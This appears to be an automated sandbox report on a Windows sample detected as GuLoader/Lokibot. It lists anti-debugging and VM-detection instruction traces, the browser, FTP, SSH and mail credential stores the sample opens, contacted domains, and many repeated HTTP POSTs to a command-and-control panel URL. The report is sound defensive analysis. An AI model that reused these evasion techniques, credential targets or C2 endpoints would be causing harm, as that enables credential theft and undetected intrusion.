Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76E37 second address: 0000000002A76EFD instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push dx 0x00000005 mov dx, 4B4Eh 0x00000009 pop dx 0x0000000b mov edi, dword ptr [ebp+20h] 0x0000000e mov dword ptr [ebp+0000024Ah], eax 0x00000014 pushad 0x00000015 mov di, FB19h 0x00000019 cmp di, FB19h 0x0000001e jne 00007F2994B88999h 0x00000024 popad 0x00000025 mov eax, 55010C71h 0x0000002a xor eax, 7B0C9DC0h 0x0000002f jmp 00007F2994B84CD2h 0x00000031 fnop 0x00000033 test edx, ecx 0x00000035 add eax, F2EE5946h 0x0000003a sub eax, 20FBEAF3h 0x0000003f cmp al, 2Dh 0x00000041 push eax 0x00000042 mov eax, dword ptr [ebp+0000024Ah] 0x00000048 cmp dx, bx 0x0000004b mov dword ptr [ebp+000001AEh], edi 0x00000051 mov edi, B416B738h 0x00000056 cmp ah, FFFFFFBAh 0x00000059 xor edi, 22E1EBC2h 0x0000005f test bl, 00000039h 0x00000062 xor edi, 2BD601D6h 0x00000068 test ebx, A774BCF7h 0x0000006e cmp ebx, ecx 0x00000070 xor edi, BD215D2Ch 0x00000076 cmp cx, bx 0x00000079 cmp edx, 9A89F087h 0x0000007f test cl, bl 0x00000081 push edi 0x00000082 test dx, ax 0x00000085 mov edi, dword ptr [ebp+000001AEh] 0x0000008b push 92F9677Ch 0x00000090 test eax, ecx 0x00000092 pushad 0x00000093 lfence 0x00000096 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A77665 second address: 0000000002A77665 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 000000000056BD5F second address: 000000000056BD87 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b nop 0x0000000c test eax, D0AB5031h 0x00000011 cmp bx, bx 0x00000014 test bl, 00000003h 0x00000017 cmp dh, FFFFFFFEh 0x0000001a add esi, 00001000h 0x00000020 cmp eax, ebx 0x00000022 pushad 0x00000023 mov edx, 00000093h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 00000000005605C5 second address: 000000000056BA17 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 test dh, bh 0x00000005 add esp, 24h 0x00000008 test dh, ah 0x0000000a cmp dx, A12Ah 0x0000000f call 00007F2994B8FD15h 0x00000014 test dh, ch 0x00000016 call 00007F2994B84FF4h 0x0000001b test dx, 96EDh 0x00000020 test dx, ax 0x00000023 xor edi, edi 0x00000025 test al, bl 0x00000027 mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000031 cmp ch, ah 0x00000033 jmp 00007F2994B84CF2h 0x00000035 test dh, ah 0x00000037 call 00007F2994B84D24h 0x0000003c call 00007F2994B84D1Dh 0x00000041 lfence 0x00000044 mov edx, E38313D7h 0x00000049 sub edx, 2F16C57Fh 0x0000004f xor edx, 80E7F4C8h 0x00000055 xor edx, 4B75BA84h 0x0000005b mov edx, dword ptr [edx] 0x0000005d lfence 0x00000060 jmp 00007F2994B84CF2h 0x00000062 push di 0x00000064 mov di, 99DEh 0x00000068 pop di 0x0000006a cmp ch, dh 0x0000006c test edx, edx 0x0000006e cmp cl, al 0x00000070 cmp ebx, ebx 0x00000072 cmp dl, cl 0x00000074 cmp ax, bx 0x00000077 cmp ch, bh 0x00000079 ret 0x0000007a mov esi, edx 0x0000007c pushad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 000000000056B9EF second address: 000000000056BB1A instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edi, eax 0x00000005 mov eax, dword ptr [ebp+00000175h] 0x0000000b jnl 00007F2994B84C0Ah 0x00000011 test dl, dl 0x00000013 cmp dl, FFFFFFE9h 0x00000016 ret 0x00000017 cmp ebx, ebx 0x00000019 mov dword ptr [ebp+0000009Ch], 00000000h 0x00000023 test eax, eax 0x00000025 mov edi, B28D7814h 0x0000002a test ebx, eax 0x0000002c test ax, bx 0x0000002f xor edi, 94CDCD0Ch 0x00000035 add edi, C10EBF9Eh 0x0000003b test ax, dx 0x0000003e add edi, 18B08B4Ah 0x00000044 mov ecx, F9001DB1h 0x00000049 test edx, edx 0x0000004b test si, 62FDh 0x00000050 xor ecx, B787FB11h 0x00000056 xor ecx, 80F9B81Eh 0x0000005c jmp 00007F2994B84CD2h 0x0000005e test ah, FFFFFF87h 0x00000061 add ecx, 318327E2h 0x00000067 cmp dx, bx 0x0000006a cmp cl, FFFFFFE1h 0x0000006d cmp bh, dh 0x0000006f pushad 0x00000070 mov cx, DA7Eh 0x00000074 cmp cx, DA7Eh 0x00000079 jne 00007F2994B7A0F0h 0x0000007f popad 0x00000080 mov dword ptr [ebp+00000270h], edi 0x00000086 mov edi, ecx 0x00000088 push edi 0x00000089 cmp eax, eax 0x0000008b mov edi, dword ptr [ebp+00000270h] 0x00000091 cmp al, bl 0x00000093 cmp al, dl 0x00000095 test dh, dh 0x00000097 call 00007F2994B84E77h 0x0000009c call 00007F2994B84F00h 0x000000a1 lfence 0x000000a4 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 000000000056BB1A second address: 000000000056BB1A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F88CF074h 0x00000013 sub eax, F33A243Ch 0x00000018 add eax, C091F0E2h 0x0000001d sub eax, C5E4BD19h 0x00000022 cpuid 0x00000024 cmp bx, ax 0x00000027 bt ecx, 1Fh 0x0000002b test ecx, eax 0x0000002d jc 00007F2994B856CDh 0x00000033 popad 0x00000034 cmp cl, al 0x00000036 call 00007F2994B84EF0h 0x0000003b lfence 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000000568F50 second address: 0000000000568F50 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000000568FB5 second address: 0000000000568FB5 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 00000000005646D1 second address: 00000000005646D1 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 00000000005649A9 second address: 00000000005649A9 instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Code function: 0_2_02A7423B rdtsc

0_2_02A7423B

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

API coverage: 6.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe TID: 1852	Thread sleep count: 160 > 30			Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe TID: 1852	Thread sleep time: -9600000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Code function: 0_2_02A7423B rdtsc

0_2_02A7423B

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Code function: 0_2_02A78888 LdrInitializeThunk,

0_2_02A78888

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7423B mov eax, dword ptr fs:[00000030h]	0_2_02A7423B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A752EE mov eax, dword ptr fs:[00000030h]	0_2_02A752EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7AAF6 mov eax, dword ptr fs:[00000030h]	0_2_02A7AAF6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75347 mov eax, dword ptr fs:[00000030h]	0_2_02A75347
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74E3A mov eax, dword ptr fs:[00000030h]	0_2_02A74E3A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C70C mov eax, dword ptr fs:[00000030h]	0_2_02A7C70C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77C8A mov eax, dword ptr fs:[00000030h]	0_2_02A77C8A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7B46E mov eax, dword ptr fs:[00000030h]	0_2_02A7B46E

Enables debug privileges

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'

Jump to behavior

Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Code function: 0_2_02A7E6B0 cpuid

0_2_02A7E6B0

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Lokibot

Source: Yara match

File source: dump.pcap, type: PCAP

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Remote Access Functionality:

Yara detected Lokibot

Source: Yara match

File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
176.9.242.251	amirantoyo.ir	Germany		24940	HETZNER-ASDE	false
199.195.117.165	andreameixueiro.com	United States		55293	A2HOSTINGUS	false

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
andreameixueiro.com	199.195.117.165	true
amirantoyo.ir	176.9.242.251	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://amirantoyo.ir/az/five/fre.php	false	Avira URL Cloud: safe	unknown

AV Detection:

Multi AV Scanner detection for submitted file

Source: 8rbuJ8Ycv1.exe

ReversingLabs: Detection: 41%

Compliance:

Uses 32bit PE files

Source: 8rbuJ8Ycv1.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 199.195.117.165:443 -> 192.168.2.4:49772 version: TLS 1.2

Networking:

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
